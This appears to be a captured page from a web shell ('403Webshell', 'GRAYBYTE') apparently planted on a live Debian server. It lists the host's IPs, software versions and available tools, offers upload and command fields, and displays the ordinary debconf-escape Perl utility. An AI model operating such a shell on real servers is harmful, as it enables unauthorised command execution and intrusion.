- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 170.150.155.74  /  Your IP : 18.218.251.99
Web Server : Apache/2.4.53 (Debian)
System : Linux b22bf132354b 5.4.0-162-generic #179-Ubuntu SMP Mon Aug 14 08:51:31 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/bin/debconf-escape
#!/usr/bin/perl -w
# This file was preprocessed, do not edit!


use strict;
use Getopt::Long;

use vars qw($escape $unescape);

sub usage {
	print STDERR <<EOF;
Usage: debconf-unescape -e|-u < input-text
  -e, --escape      escape text
  -u, --unescape    unescape text

Exactly one of -e or -u must be used.
EOF
	exit(1);
}

$escape=0;
$unescape=0;

GetOptions(
	"escape|e" => \$escape,
	"unescape|u" => \$unescape,
) || usage();

if ($escape == $unescape) {
	usage();
}

if ($escape) {
	while (<>) {
		s/\\/\\\\/g;
		s/\n/\\n/g;
		print;
	}
} else {
	while (<>) {
		for (split /(\\.)/) {
			s/\\(.)/$1 eq "n" ? "\n" : $1/eg;
			print;
		}
	}
}


Youez - 2016 - github.com/yon3zu
LinuXploit